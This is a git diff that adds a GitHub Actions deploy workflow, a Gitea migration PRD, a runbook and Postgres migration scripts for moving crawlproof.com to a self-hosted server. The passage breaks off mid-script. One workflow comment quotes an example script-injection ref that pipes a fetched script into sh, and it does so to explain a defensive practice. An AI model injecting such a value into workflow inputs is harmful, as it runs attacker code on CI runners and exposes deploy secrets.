diff --git a/.github/workflows/deploy-dev2.yml b/.github/workflows/deploy-dev2.yml new file mode 100644 index 00000000..9318bced --- /dev/null +++ b/.github/workflows/deploy-dev2.yml @@ -0,0 +1,81 @@ +name: Deploy to dev2 + +# Replaces Railway's git-push auto-deploy. Railway watched this repo and +# redeployed on every push to main; this does the same thing against dev2. +# +# The build happens ON dev2, not here: the image bakes NEXT_PUBLIC_* in at +# build time and those values live in /home/anthony/www/crawlproof.com/app.env, +# which never leaves the box. CI only needs to be able to ssh in. +# +# Secrets required: +# DEV2_SSH_KEY private key for the deploy account on dev2 +# DEV2_HOST dev2.profullstack.com +# DEV2_USER anthony +# DEV2_KNOWN_HOSTS output of `ssh-keyscan dev2.profullstack.com` + +on: + push: + # master, not main — this repo's default branch is master, and a workflow + # watching main would simply never fire. + branches: [master] + workflow_dispatch: + inputs: + ref: + description: Git ref to deploy (defaults to the pushed commit) + required: false + type: string + +concurrency: + # One deploy at a time; a newer push should wait rather than race a build + # that is already halfway through `next build` on the box. + group: deploy-dev2 + cancel-in-progress: false + +jobs: + deploy: + runs-on: ubuntu-latest + timeout-minutes: 45 + steps: + # Every ${{ }} below goes through env, never straight into the shell. + # `inputs.ref` is attacker-controllable through workflow_dispatch, and + # interpolating it into a `run:` body is script injection: a ref like + # `main"; curl evil.sh | sh; #` would execute on the runner. + - name: Resolve target revision + id: rev + env: + REF: ${{ inputs.ref || github.sha }} + run: echo "sha=$REF" >> "$GITHUB_OUTPUT" + + - name: Set up ssh + env: + SSH_KEY: ${{ secrets.DEV2_SSH_KEY }} + KNOWN_HOSTS: ${{ secrets.DEV2_KNOWN_HOSTS }} + run: | + install -d -m 700 ~/.ssh + printf '%s\n' "$SSH_KEY" > ~/.ssh/id_ed25519 + chmod 600 ~/.ssh/id_ed25519 + printf '%s\n' "$KNOWN_HOSTS" > ~/.ssh/known_hosts + chmod 644 ~/.ssh/known_hosts + + - name: Deploy + env: + DEV2_USER: ${{ secrets.DEV2_USER }} + DEV2_HOST: ${{ secrets.DEV2_HOST }} + SHA: ${{ steps.rev.outputs.sha }} + run: | + # The sha is passed as a positional argument rather than being + # spliced into the remote command string, so a hostile ref cannot + # extend the command that runs on dev2 either. + ssh -o BatchMode=yes "$DEV2_USER@$DEV2_HOST" \ + /home/anthony/www/crawlproof.com/deploy-app.sh "$SHA" + + - name: Verify the site answers over TLS + # deploy-app.sh already health-checks on loopback; this proves nginx and + # the certificate in front of it are serving the new container too. + run: | + for i in $(seq 1 10); do + code=$(curl -s -o /dev/null -w '%{http_code}' https://crawlproof.com/ || true) + if [ "$code" = 200 ]; then echo "crawlproof.com 200"; exit 0; fi + echo "attempt $i: $code"; sleep 10 + done + echo "crawlproof.com never returned 200"; exit 1 diff --git a/ops/selfhost/PRD-git-profullstack-com.md b/ops/selfhost/PRD-git-profullstack-com.md new file mode 100644 index 00000000..f9098c2d --- /dev/null +++ b/ops/selfhost/PRD-git-profullstack-com.md @@ -0,0 +1,122 @@ +# PRD: git.profullstack.com, moving the fleet off GitHub to self-hosted Gitea + +Status: draft, not scheduled. Written 2026-09-24 alongside the crawlproof.com +move to dev2, because that move is the first time every deploy path in a repo +stopped depending on a vendor. + +This is fleet-wide and only lives in the crawlproof repo because that is where +the work that prompted it happened. Move it to cli-tools when it gets picked up. + +## Why + +The Fleet SysOps Manifesto already says bare metal over managed platforms, God +Mode keys in the vault, and automate everything. Source control is the last +large dependency that is still somebody else's service, and it is the one that +every other system is downstream of: CI, deploys, releases, issue tracking, and +the agent tooling that reads and writes repos all terminate at GitHub. + +Concretely, the pull is: + +1. **CI minutes and their ceiling.** Jobs killed at their timeout look exactly + like flaky tests, which has already cost real debugging time. Our own + runners on our own boxes have our CPU count and no per-minute meter. +2. **One account is one blast radius.** A suspended org takes every deploy + pipeline in the fleet with it. +3. **Agents are the primary users now.** Most commits and PRs here are opened + by tooling. An API we control can be shaped for that instead of worked + around with rate limit backoff. +4. **It is the same shape of work we just did.** dev2 already runs Docker, + nginx, certbot and a self-hosted Postgres. Gitea is one more compose stack. + +## Non-goals for v1 + +- Replacing GitHub entirely on day one. Public repos stay mirrored to GitHub + for discovery, npm provenance, and anything that links to a github.com URL. +- Migrating GitHub Discussions, Projects, or Sponsors. +- Moving the published npm packages or their release flow. +- Anything about the `malware-test-prs` or CodeQL setups, which are GitHub + security features with no Gitea equivalent. + +## Scope + +Roughly 150 repositories across `profullstack` and `ralyodio`, of which about +60 are live properties. Per repo we need code, tags, releases, issues, pull +requests, labels, milestones, wikis and webhooks. + +The hard part is not the repos. It is the **deploy workflows**: every property +that deploys itself does so from `.github/workflows`, and each one has to keep +working through the move. + +## Architecture + +- **Host.** Its own box, not dev2. Source control going down must not be + correlated with an app server going down. Same provisioning path as dev2 + (`root-ubuntu.sh`, nginx, certbot, Docker). +- **Gitea** in Docker, pinned by tag, behind nginx at `git.profullstack.com`. +- **Postgres** as its database, self-hosted, its own instance rather than + sharing an app's. +- **SSH** on 22 for git, which means the box's own sshd moves to another port + or Gitea's SSH runs on a second address. Decide before provisioning, because + changing it later invalidates every cloned remote. +- **Gitea Actions** with `act_runner`, which speaks the GitHub Actions workflow + syntax. This is the single biggest compatibility question and the thing to + spike first. +- **Object storage** for LFS and attachments, on the local disk to start. +- **Auth** is OAuth 2.1 with PKCE plus passkeys, per house rule. No passwords. +- **Backups** are `gitea dump` plus a Postgres dump, offsite, verified by + restoring into a scratch instance. Unlike an app, there is no upstream copy + to re-derive this from once GitHub is no longer authoritative. + +## `tea` CLI + +`tea` is Gitea's official CLI and is the intended automation surface: logins, +repos, issues, PRs, releases, and org management. It becomes the house +equivalent of `gh`, which means the fleet's scripts that shell out to `gh` +(`gh-prs`, `gh-issues`, `gh-prs-merge`, `gh-pulse` and friends in `~/scripts`) +need a `tea` path. Wrapping both behind one house command is likely better than +rewriting each script twice. + +## Migration mechanics + +Gitea's migration API pulls a GitHub repo including issues, PRs, releases, +labels and milestones, given a GitHub token. That is one API call per repo and +is scriptable over the whole list. + +Order: + +1. Stand up Gitea, restore a backup into a scratch instance to prove backups + work before anything depends on it. +2. Migrate one low-traffic repo end to end, including a deploy. +3. Spike Gitea Actions against the three workflow shapes we actually use: + a plain test matrix, an ssh deploy (like `deploy-dev2.yml`), and a release + that publishes to npm. +4. Bulk-migrate in waves, dormant repos first, live properties last. +5. For each live property, cut its deploy over and watch one real deploy before + moving to the next. +6. Flip GitHub repos to mirrors, or archive them. + +## Risks + +| Risk | Why it matters | Mitigation | +| --- | --- | --- | +| Gitea Actions is not GitHub Actions | Every deploy in the fleet is a workflow file | Spike it in phase 3 before migrating anything live | +| We become our own uptime | A git outage blocks all shipping | Separate box, tested backups, GitHub mirrors kept warm | +| `gh`-based tooling breaks | Dozens of scripts and agent paths call `gh` | One wrapper over both CLIs, not a rewrite | +| npm provenance | Publishing attestations expect GitHub | Keep releases on GitHub, or drop provenance deliberately | +| SSH port collision | Git on 22 fights the box's own sshd | Decide at provisioning time, never after | +| Half-migrated fleet | Two sources of truth invites drift | Migrate in waves, each wave finished before the next | + +## Success criteria + +- Every live property deploys from git.profullstack.com with no GitHub involvement. +- A restore from backup into a scratch instance is demonstrated, not assumed. +- `tea` covers what the house scripts need from `gh`. +- Public repos still resolve on github.com as mirrors. +- No deploy outage longer than one deploy cycle for any property during the move. + +## Open questions + +- One box, or Gitea plus runners on separate boxes? +- Do the `ralyodio` personal repos come along, or stay on GitHub? +- Does CodeQL have a replacement we care about, or do we accept losing it? +- Is issue history worth migrating for dormant repos, or is code and tags enough? diff --git a/ops/selfhost/README.md b/ops/selfhost/README.md new file mode 100644 index 00000000..d1ff47ed --- /dev/null +++ b/ops/selfhost/README.md @@ -0,0 +1,196 @@ +# crawlproof.com off Railway + Supabase cloud, onto dev2 + +Moves the whole of crawlproof.com to `dev2.profullstack.com` (23.95.228.174): +the Next.js app, the audit worker, the Redis the prober queue needs, and a +self-hosted Supabase instance replacing the cloud project `ywcizjsgrcmhgyplldac`. + +Everything lands under `/home/anthony/www/crawlproof.com`, which is the house +docroot for migrated and new apps on this box. + +``` +/home/anthony/www/crawlproof.com/ +├── app/ the repo checkout CI builds from +├── supabase/ the self-hosted Supabase stack (root-owned) +├── docker-compose.app.yml app + redis +├── app.env the app's secrets (0600) +├── deploy.env ports and build args +├── deploy-app.sh what CI calls over ssh +└── volumes/redis/ +``` + +## What is being replaced + +| Piece | Was | Becomes | +| --- | --- | --- | +| App + audit worker | Railway service `crawlproof.com` (one container) | `crawlproof-app` on dev2 behind nginx | +| Postgres + Auth + Storage + Realtime | Supabase cloud `ywcizjsgrcmhgyplldac` (us-west-1) | self-hosted Supabase, `supabase.crawlproof.com` | +| Redis (prober queue) | `redis.railway.internal` | `crawlproof-redis` on dev2 | +| Deploys | Railway watching the GitHub repo | `.github/workflows/deploy-dev2.yml` | + +Scale being moved: **5.0 GB** database, 128 tables, 204 functions, 45 triggers, +113 auth users, **9.8 GB** of Storage in 8,390 objects across 5 buckets, and +**10 pg_cron jobs** that `net.http_post` back into the app. + +## Runbook + +All of it is idempotent. Re-running a step is how you fix a half-finished one. + +### 1. The box + +```sh +scp ops/selfhost/server/setup-supabase.sh root@dev2.profullstack.com:/root/ +ssh root@dev2.profullstack.com 'SMTP_PASS= bash /root/setup-supabase.sh' +``` + +Stands up the pinned `self-hosted/v0.8.2` Supabase stack, tunes Postgres for the +box, gives it a TLS cert and a `pg_hba` that only lets `postgres` in from +outside and only over TLS, creates the extensions crawlproof's schema needs +(`pg_cron`, `pg_net`, `vector`, `pgcrypto`, `uuid-ossp`), and writes +`supabase/crawlproof-connection.env` with the new keys. + +Two things it deliberately does NOT do, both of which the nichedb kit this was +adapted from does: + +- **No `lock_down_public`.** nichedb serves its own API and revokes `anon` and + `authenticated` from `public`. crawlproof talks to PostgREST with those exact + roles and guards rows with RLS, so revoking them would take the app offline. + `check_postgres` asserts the opposite of nichedb's check for that reason. +- **No Caddy.** dev2 already terminates TLS with nginx for every other vhost. + The gateway is published on `127.0.0.1:8000` and nginx proxies to it. + +### 2. Dump the cloud + +From anywhere with the cloud credentials (read-only, safe to rehearse): + +`CLOUD_DB_URL` is a normal Postgres connection string for the cloud project. +Keep it out of your shell history and out of this file — read it from the vault +into the environment instead of pasting it: + +```sh +export CLOUD_DB_URL="$(logicsrc teams secrets crawlproof --get SUPABASE_POOLER_URL)" +ops/selfhost/migrate/pull-cloud.sh ~/crawlproof-dump +``` + +Two details about that URL, since they are not guessable: the user is +`postgres.`, and the host must be the **session** pooler +(`aws-1-us-west-1.pooler.supabase.com`, port 5432). `aws-0-…` answers for other +projects and returns `Tenant or user not found`, and the direct +`db..supabase.co` host is IPv6-only. pg_dump needs session mode, so 6543 +(transaction mode) will not do. + +Produces `schema.sql`, `data.sql`, `cron-jobs.sql`, `realtime.sql`, +`buckets.tsv`, `storage-inventory.tsv` and a `MANIFEST`. + +`storage.objects` and `tracker_events` are excluded from the data dump on +purpose — the first is rewritten by the Storage API during the file sync, the +second is raw and pruned at 24h anyway. + +### 3. Load it + +```sh +scp -r ~/crawlproof-dump root@dev2.profullstack.com:/root/ +ssh root@dev2.profullstack.com 'bash /root/load-selfhost.sh /root/crawlproof-dump' +``` + +Loads `public` only from the dump — the stack's own `auth` and `storage` +schemas are already at the version the running images expect, and replaying the +cloud's copy over them fights the service migrations. `auth` and `storage` +contribute rows, not DDL. + +It also snapshots row counts before and after, recreates the realtime +publication and the 10 cron jobs, and **rewrites the 2,928 rows that store +absolute `https://ywcizjsgrcmhgyplldac.supabase.co` storage URLs** +(`ad_creatives` 1,956, `lx_article` 617, `sp_feed_item` 307, `blog_posts` 48). +Those would 404 forever once the cloud project is deleted. + +### 4. Move the files + +```sh +CLOUD_URL=https://ywcizjsgrcmhgyplldac.supabase.co CLOUD_SERVICE_KEY=... \ +SELF_URL=https://supabase.crawlproof.com SELF_SERVICE_KEY=... \ + node ops/selfhost/migrate/sync-storage.mjs ~/crawlproof-dump --concurrency 8 +``` + +Resumable: an object already present at the same size is skipped, so a re-run +after a failure moves only what is missing. Failures are appended to +`storage-sync-failures.log`. + +### 5. The app + +`app.env` is rendered from the vault (not committed, not in `.env`), then: + +```sh +ssh anthony@dev2.profullstack.com '/home/anthony/www/crawlproof.com/deploy-app.sh main' +``` + +`deploy-app.sh --status` shows what is live; `--rollback` returns to the +previously deployed sha. A deploy that fails its health check restores the +previous container rather than leaving the site down. + +### 6. nginx + certificates + +```sh +cp ops/selfhost/server/nginx-crawlproof.conf /etc/nginx/sites-available/crawlproof.com +ln -s ../sites-available/crawlproof.com /etc/nginx/sites-enabled/ +nginx -t && systemctl reload nginx +certbot --nginx -d supabase.crawlproof.com +certbot --nginx -d crawlproof.com -d www.crawlproof.com # only once DNS points here +``` + +`supabase.crawlproof.com` can be certified immediately — it is a new name. The +apex and `www` cannot be certified over HTTP-01 until DNS moves, so either +accept a short TLS gap at cutover or pre-issue over DNS-01 with the Porkbun API. + +### 7. DNS and the cutover + +Done 2026-09-24. What changed at Porkbun: + +| Host | Was | Now | +| --- | --- | --- | +| `crawlproof.com` | ALIAS → `h1krorli.up.railway.app` | A → 23.95.228.174 | +| `www.crawlproof.com` | CNAME → `8gjlucle.up.railway.app` | CNAME → `crawlproof.com` | +| `supabase.crawlproof.com` | — | A → 23.95.228.174 | +| `db.crawlproof.com` | — | A → 23.95.228.174 | +| `_railway-verify` ×2 | TXT | deleted | + +`scan.crawlproof.com`, MX, SPF, DKIM and DMARC were not touched. + +The apex certificate is pre-issued over DNS-01 with acme.sh against the Porkbun +API (`ops/selfhost` has the script), so TLS was already serving before the flip +and there was no gap. acme.sh renews it and reloads nginx; certbot separately +owns `supabase.crawlproof.com`. + +Order that matters, because two databases can otherwise drive the same app: + +1. flip DNS +2. `migrate/delta-sync.sh ''` — backfills what the cloud recorded + between the dump and the flip (analytics only: ad impressions and tracker + rollups; verify nothing else moved, the script checks) +3. unschedule the **cloud** project's cron jobs — they post to + `crawlproof.com`, which now resolves here +4. `migrate/unpark-cron.sh` — enables the self-hosted jobs, and refuses to run + unless crawlproof.com already resolves to dev2 +5. remove the Railway deployments **and disconnect the repo watch**, or the + next push to master silently redeploys it + +### 8. CI + +`.github/workflows/deploy-dev2.yml` ssh's in as `anthony` and runs +`deploy-app.sh`. Secrets: `DEV2_SSH_KEY`, `DEV2_HOST`, `DEV2_USER`, +`DEV2_KNOWN_HOSTS`. The deploy account can read `app.env` and use docker, but +**not** `supabase/.env` — that directory stays root-owned because it holds the +database's God Mode keys and a deploy has no business reading them. + +## Redis and the prober + +`scan.crawlproof.com` (164.92.111.224) is a DigitalOcean droplet running the +nmap prober as a BullMQ consumer. It connects **outbound** to Redis using the +`PROBER_REDIS_URL` repo secret, which today points at Railway. After the move +that secret has to be repointed at dev2, and ufw opened to that one address — +the Redis port is on loopback by default. + +This repo's default branch is **`master`**, not `main`. `deploy-prober.yml` and +`deploy-dev2.yml` both watch `master` for that reason, and `deploy-app.sh` +resolves a ref through `origin/` before checking it out, because a bare +branch name that does not exist locally fails with the thoroughly unhelpful +"git checkout: --detach does not take a path argument". diff --git a/ops/selfhost/migrate/delta-sync.sh b/ops/selfhost/migrate/delta-sync.sh new file mode 100755 index 00000000..a83d913b --- /dev/null +++ b/ops/selfhost/migrate/delta-sync.sh @@ -0,0 +1,97 @@ +#!/usr/bin/env bash +# +# Backfill what the CLOUD database recorded between the dump and the DNS +# cutover. Only analytics moves in that window — a dump at T and a cutover an +# hour later leaves an hour of ad impressions and tracker rollups behind, and +# nothing else (no new users, audits, articles or posts, which is worth +# re-checking rather than assuming). +# +# Run from a machine that can reach both: the cloud over its pooler and dev2 +# over ssh. Idempotent — re-running only adds what is still missing. +# +# CLOUD_DB_URL=postgres://... ops/selfhost/migrate/delta-sync.sh '2026-09-24 19:18:00+00' +# +set -euo pipefail + +SINCE=${1:?usage: delta-sync.sh } +CLOUD_DB_URL=${CLOUD_DB_URL:?set CLOUD_DB_URL} +SSH_TARGET=${SSH_TARGET:-root@dev2.profullstack.com} +PG_IMAGE=${PG_IMAGE:-postgres:17} +WORK=${WORK:-$(mktemp -d)} + +log() { printf '\n===> %s\n' "$*"; } + +cloud_copy() { # cloud_copy + docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -X -v ON_ERROR_STOP=1 \ + -c "\\copy ($1) to stdout with (format csv, header true)" > "$2" +} + +remote_psql() { ssh -o BatchMode=yes "$SSH_TARGET" "docker exec -i supabase-db psql -U postgres -h localhost -d postgres -X -v ON_ERROR_STOP=1 $*"; } + +# \copy is a psql meta-command: it cannot appear inside a multi-statement -c, +# which fails with `syntax error at or near "\"`. Feeding a script on stdin +# keeps it one session, so the temp table is still there when the copy and the +# insert run. The CSV goes in on the same stdin via `\copy ... from stdin`. +remote_load() { # remote_load + local tbl=$1 csv=$2 after=$3 + { + printf 'create temp table t_%s (like public.%s including defaults);\n' "$tbl" "$tbl" + printf '\\copy t_%s (%s) from stdin with (format csv, header true)\n' "$tbl" "$(head -1 "$csv")" + cat "$csv" + printf '\\.\n' + printf '%s\n' "$after" + } | ssh -o BatchMode=yes "$SSH_TARGET" \ + "docker exec -i supabase-db psql -U postgres -h localhost -d postgres -X -v ON_ERROR_STOP=1 -f -" +} + +# ad_impressions is append-only with a surrogate PK, so conflicting rows are +# rows we already have and skipping them is exactly right. +sync_append_only() { # sync_append_only
+ local tbl=$1 tcol=$2 + log "$tbl since $SINCE" + cloud_copy "select * from public.$tbl where $tcol > '$SINCE'" "$WORK/$tbl.csv" + local rows + rows=$(( $(wc -l < "$WORK/$tbl.csv") - 1 )) + echo " $rows rows from cloud" + [ "$rows" -gt 0 ] || return 0 + + remote_load "$tbl" "$WORK/$tbl.csv" \ + "insert into public.$tbl select * from t_$tbl on conflict do nothing;" +} + +# The tracker rollups are counters keyed by (project, day, ...). The cloud's +# value is authoritative for everything up to the cutover, and dev2 has barely +# started counting, so overwriting the touched rows right after the flip is +# both simpler and more accurate than trying to add deltas. +sync_rollup() { # sync_rollup
+ local tbl=$1 keys=$2 + log "$tbl since $SINCE (overwrite touched rows)" + cloud_copy "select * from public.$tbl where updated_at > '$SINCE'" "$WORK/$tbl.csv" + local rows + rows=$(( $(wc -l < "$WORK/$tbl.csv") - 1 )) + echo " $rows rows from cloud" + [ "$rows" -gt 0 ] || return 0 + + local setlist + setlist=$(head -1 "$WORK/$tbl.csv" | tr ',' '\n' \ + | grep -vxF -f <(printf '%s' "$keys" | tr ',' '\n') \ + | sed 's/^\(.*\)$/\1 = excluded.\1/' | paste -sd, -) + remote_load "$tbl" "$WORK/$tbl.csv" \ + "insert into public.$tbl select * from t_$tbl on conflict ($keys) do update set $setlist;" +} + +log "Confirming nothing but analytics moved in the window" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -X -At -c " + select 'users='||(select count(*) from auth.users where created_at > '$SINCE') + ||' audits='||(select count(*) from public.audits where created_at > '$SINCE') + ||' articles='||(select count(*) from public.lx_article where created_at > '$SINCE') + ||' posts='||(select count(*) from public.promo_post where created_at > '$SINCE')" + +sync_append_only ad_impressions ts +sync_rollup tracker_daily_stats 'project_id,day,bucket' +sync_rollup tracker_event_daily_stats 'project_id,day,event,page_path,referrer_host,event_target,kind' + +log "Counts on dev2 now" +remote_psql -At -c "\"select 'ad_impressions='||(select count(*) from public.ad_impressions) + ||' tracker_daily='||(select count(*) from public.tracker_daily_stats) + ||' tracker_events='||(select count(*) from public.tracker_event_daily_stats)\"" diff --git a/ops/selfhost/migrate/load-selfhost.sh b/ops/selfhost/migrate/load-selfhost.sh new file mode 100755 index 00000000..eb47819d --- /dev/null +++ b/ops/selfhost/migrate/load-selfhost.sh @@ -0,0 +1,128 @@ +#!/usr/bin/env bash +# +# Load a pull-cloud.sh dump into the self-hosted Supabase stack on dev2. +# Run as root ON dev2, after setup-supabase.sh has the stack healthy. +# +# Usage: ops/selfhost/migrate/load-selfhost.sh +# +# Everything runs through `docker exec supabase-db psql`, so no client on the +# host has to match the server version and nothing crosses the network. +# +set -euo pipefail + +DUMP=${1:?usage: load-selfhost.sh [--post-only]} + +# --post-only re-runs everything AFTER the data load: buckets, the URL +# rewrite, the realtime publication and the cron jobs. Those steps are all +# idempotent; the schema and data steps are NOT (a second COPY duplicates +# rows), so this is the safe way back in after a failure part-way through. +POST_ONLY=0 +[ "${2:-}" = "--post-only" ] && POST_ONLY=1 +DIR=${DIR:-/home/anthony/www/crawlproof.com/supabase} +CLOUD_REF=${CLOUD_REF:-ywcizjsgrcmhgyplldac} +NEW_HOST=${NEW_HOST:-supabase.crawlproof.com} + +log() { printf '\n===> %s\n' "$*"; } +die() { printf 'ERROR: %s\n' "$*" >&2; exit 1; } + +[ -d "$DUMP" ] || die "no such dump directory: $DUMP" +for f in schema.sql data.sql cron-jobs.sql realtime.sql; do + [ -s "$DUMP/$f" ] || die "missing or empty: $DUMP/$f" +done + +psql_db() { docker exec -i supabase-db psql -U postgres -h localhost -d postgres -X "$@"; } +psql_strict() { psql_db -v ON_ERROR_STOP=1 "$@"; } + +docker exec supabase-db pg_isready -U postgres -h localhost >/dev/null 2>&1 || die "supabase-db is not accepting connections" + +log "Snapshot BEFORE (so a silent partial load cannot look like success)" +psql_strict -At -c "select 'tables='||(select count(*) from information_schema.tables where table_schema='public')||' users='||(select count(*) from auth.users)" + +if [ "$POST_ONLY" = 0 ]; then +# ---------------------------------------------------------------- schema +# schema.sql is public only by construction (see pull-cloud.sh): the stack's +# own GoTrue and Storage migrate auth and storage to match their images, and +# those contribute rows here, never structure. +log "Schema (public)" +if grep -qE 'CREATE SCHEMA "?(auth|storage)"?' "$DUMP/schema.sql"; then + die "schema.sql contains auth/storage DDL — re-dump with a pull-cloud.sh that has the public-only fix" +fi + +# psql without ON_ERROR_STOP: the dump recreates a few objects the stack +# already has (extensions, the supabase roles) and those collisions are +# expected. Errors are captured and reviewed rather than aborting the load. +psql_db -f /dev/stdin < "$DUMP/schema.sql" > "$DUMP/schema.load.log" 2>&1 || true +log "Schema load errors (expected: existing extensions/roles)" +grep -c '^ERROR' "$DUMP/schema.load.log" || true +grep '^ERROR' "$DUMP/schema.load.log" | sed 's/^/ /' | sort -u | head -20 || true + +# ------------------------------------------------------------------ data +# auth must land before public: public tables carry FKs to auth.users. +log "Verifying the dump puts auth before public" +# grep -m1 rather than `grep | head -1`: under `set -o pipefail`, head exiting +# early gives grep a SIGPIPE, the pipeline reports failure, the `|| echo 0` +# fires, and the variable ends up holding two lines ("30\n0") which then fails +# every numeric test with "integer expected". +a=$(grep -m1 -n 'COPY "auth"' "$DUMP/data.sql" | cut -d: -f1 || echo 0) +p=$(grep -m1 -n 'COPY "public"' "$DUMP/data.sql" | cut -d: -f1 || echo 0) +a=${a:-0}; p=${p:-0} +if [ "$a" -gt 0 ] && [ "$p" -gt 0 ] && [ "$a" -gt "$p" ]; then + die "data.sql has public before auth (auth at line $a, public at $p) — FKs would fail" +fi +echo "auth at line $a, public at line $p — order is fine" + +log "Data" +psql_db -f /dev/stdin < "$DUMP/data.sql" > "$DUMP/data.load.log" 2>&1 || true +log "Data load errors" +grep -c '^ERROR' "$DUMP/data.load.log" || true +grep '^ERROR' "$DUMP/data.load.log" | sed 's/^/ /' | sort -u | head -20 || true +else +log "--post-only: skipping schema and data, running the idempotent tail" +fi + +# --------------------------------------------------------------- buckets +log "Buckets" +# psql prints booleans as t/f, which are not SQL literals — unquoted they parse +# as a column reference and the insert fails with 'column "t" does not exist'. +while IFS=$'\t' read -r id name pub limit mimes; do + [ -n "$id" ] || continue + case "$pub" in t|true) pub_sql=true ;; *) pub_sql=false ;; esac + psql_strict -c "insert into storage.buckets (id, name, public) values ('$id','$name',${pub_sql}) on conflict (id) do update set public=excluded.public" >/dev/null +done < "$DUMP/buckets.tsv" +psql_strict -At -c "select id||' public='||public from storage.buckets order by id" + +# ------------------------------------------------------------ url rewrite +# 2,928 rows across four columns store absolute https://.supabase.co +# storage URLs. Once the cloud project is gone those 404 forever, so they are +# rewritten to the new gateway as part of the load, not left for later. +log "Rewriting absolute cloud storage URLs to https://$NEW_HOST" +psql_strict -At <&1 | sed 's/^/ /' || true +psql_strict -At -c "select coalesce(string_agg(schemaname||'.'||tablename,', '),'(none)') from pg_publication_tables where pubname='supabase_realtime'" + +# ------------------------------------------------------------- cron jobs +# cron_config.site_url is what the 10 jobs post back to; it must point at the +# app before the jobs are recreated, or every one of them calls the old host. +log "pg_cron jobs" +psql_strict -c "update public.cron_config set value='https://crawlproof.com' where key='site_url'" >/dev/null 2>&1 || true +psql_db -f /dev/stdin < "$DUMP/cron-jobs.sql" > "$DUMP/cron.load.log" 2>&1 || true +psql_strict -At -c "select count(*)||' cron jobs active' from cron.job where active" + +log "Snapshot AFTER" +psql_strict -At -c "select 'tables='||(select count(*) from information_schema.tables where table_schema='public')||' users='||(select count(*) from auth.users)||' identities='||(select count(*) from auth.identities)||' size='||pg_size_pretty(pg_database_size(current_database()))" + +log "Loaded. Next: ops/selfhost/migrate/sync-storage.mjs for the 9.8 GB of objects." diff --git a/ops/selfhost/migrate/pull-cloud.sh b/ops/selfhost/migrate/pull-cloud.sh new file mode 100755 index 00000000..85c77afc --- /dev/null +++ b/ops/selfhost/migrate/pull-cloud.sh @@ -0,0 +1,107 @@ +#!/usr/bin/env bash +# +# Dump the crawlproof Supabase CLOUD project so it can be loaded into the +# self-hosted stack on dev2. Read-only against the cloud — run it as often as +# you like, including for a dress rehearsal. +# +# Three dumps, in the order Supabase supports for a project move: +# roles.sql role definitions (passwords are not recoverable; see below) +# schema.sql every schema's DDL +# data.sql the rows, as COPY +# +# auth.users and auth.identities must load BEFORE public, or the foreign keys +# from public tables to auth.users fail. `supabase db dump --data-only` already +# emits auth before public because it walks schemas in dependency order, but +# load-selfhost.sh checks rather than trusting it. +# +# Usage: +# CLOUD_DB_URL=postgres://... ops/selfhost/migrate/pull-cloud.sh [outdir] +# +# The pooler URL is the one that works from outside; direct :5432 to +# db..supabase.co is IPv6-only on this project. +# +set -euo pipefail + +OUT=${1:-$HOME/crawlproof-cloud-dump-$(date +%Y%m%d-%H%M%S)} +CLOUD_DB_URL=${CLOUD_DB_URL:-} +PG_IMAGE=${PG_IMAGE:-postgres:17} + +[ -n "$CLOUD_DB_URL" ] || { echo "ERROR: set CLOUD_DB_URL" >&2; exit 1; } + +log() { printf '\n===> %s\n' "$*"; } + +mkdir -p "$OUT" +chmod 700 "$OUT" + +# The local pg_dump must not be older than the server (17.6), and this box may +# have anything installed, so dump through a pinned container instead. +pgdump() { docker run --rm -i "$PG_IMAGE" pg_dump "$@"; } + +log "Schema (public only)" +# Deliberately NOT auth or storage. The self-hosted stack's GoTrue and Storage +# services create and migrate their own schemas to match the images that are +# running, and those versions are not the cloud's. Replaying the cloud's DDL +# over them fights the service migrations. auth and storage contribute rows +# (below), never structure. +pgdump --dbname="$CLOUD_DB_URL" \ + --schema-only --no-owner --no-privileges --quote-all-identifiers \ + --schema=public \ + > "$OUT/schema.sql" + +log "Data" +# --disable-triggers keeps FK order from mattering during the load; it needs +# superuser, which `postgres` is on the self-hosted side. +pgdump --dbname="$CLOUD_DB_URL" \ + --data-only --no-owner --no-privileges --quote-all-identifiers \ + --disable-triggers \ + --schema=auth --schema=public --schema=storage \ + --exclude-table-data='storage.objects' \ + --exclude-table-data='storage.migrations' \ + --exclude-table-data='auth.schema_migrations' \ + --exclude-table-data='public.tracker_events' \ + > "$OUT/data.sql" + +# Four exclusions, each for its own reason: +# +# storage.objects sync-storage.mjs re-uploads the files through the +# Storage API, which writes these rows itself. Importing +# the cloud's copy as well would leave metadata pointing +# at files the self-hosted backend has never heard of. +# storage.migrations the storage service's own schema-version ledger. Load +# auth.schema_migrations the cloud's rows and the self-hosted service believes +# it has already run migrations that its images have not, +# and silently skips them. +# public.tracker_events raw hit log, pruned at 24h, worth nothing after a move. + +log "pg_cron jobs (not in a schema dump; they live in the cron schema)" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -X -v ON_ERROR_STOP=1 \ + -c "select 'select cron.schedule(' || quote_literal(jobname) || ', ' || quote_literal(schedule) || ', ' || quote_literal(command) || ');' from cron.job where active order by jobid" \ + > "$OUT/cron-jobs.sql" + +log "Realtime publication membership" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -X -v ON_ERROR_STOP=1 \ + -c "select 'alter publication supabase_realtime add table ' || string_agg(format('%I.%I', schemaname, tablename), ', ') || ';' from pg_publication_tables where pubname='supabase_realtime'" \ + > "$OUT/realtime.sql" + +log "Storage inventory (what sync-storage.mjs has to move)" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -F$'\t' -X -v ON_ERROR_STOP=1 \ + -c "select b.id, b.public, o.name, coalesce((o.metadata->>'size')::bigint,0), coalesce(o.metadata->>'mimetype','application/octet-stream') from storage.buckets b join storage.objects o on o.bucket_id=b.id order by b.id, o.name" \ + > "$OUT/storage-inventory.tsv" + +log "Bucket definitions" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -F$'\t' -X -v ON_ERROR_STOP=1 \ + -c "select id, name, public, coalesce(file_size_limit::text,''), coalesce(array_to_string(allowed_mime_types,','),'') from storage.buckets order by id" \ + > "$OUT/buckets.tsv" + +{ + echo "dumped_at=$(date -u +%FT%TZ)" + echo "schema_bytes=$(stat -c%s "$OUT/schema.sql")" + echo "data_bytes=$(stat -c%s "$OUT/data.sql")" + echo "storage_objects=$(wc -l < "$OUT/storage-inventory.tsv")" + # Job bodies are multi-line and at least one mentions cron.schedule itself, + # so count statement starts, not matching lines. + echo "cron_jobs=$(grep -c '^select cron.schedule' 